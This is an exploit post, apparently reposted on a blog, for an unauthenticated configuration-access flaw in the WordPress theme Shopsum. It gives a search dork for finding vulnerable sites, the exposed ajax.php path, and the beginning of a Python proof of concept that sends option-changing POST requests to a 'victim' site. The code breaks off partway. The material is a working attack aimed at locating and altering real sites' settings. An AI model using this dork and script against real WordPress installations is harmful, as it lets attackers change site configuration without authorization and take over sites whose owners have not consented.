# Exploit Title : Wordpress Premium Themes Shopsum Unauthenticated Configuration Access Vulnerability # Author : Mr.Buckethead # Date : November 13th, 2014 # Category : Web Applications # Vulnerability : Unauthenticated Configuration Access # Tested On : Windows 7 32-bit, Backbox # Dork : inurl:/wp-content/themes/shopsum/hades_framework/ or use ur imagination #Exploit : http://localhost/path/wp-content/themes/shopsum/hades_framework/option_panel/ajax.php # POC : Save File As Python (.py) = import httplib, urllib # target site site = "victim" #<--- no http:// or https:// # path to ajax.php url = "t/wp-content/themes/shopsum/hades_framework/option_panel/ajax.php" def ChangeOption(site, url, option_name, option_value): params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value}) headers = {"Content-type": "application/x-www-form-urlencoded", "Accept...
Komentar
Posting Komentar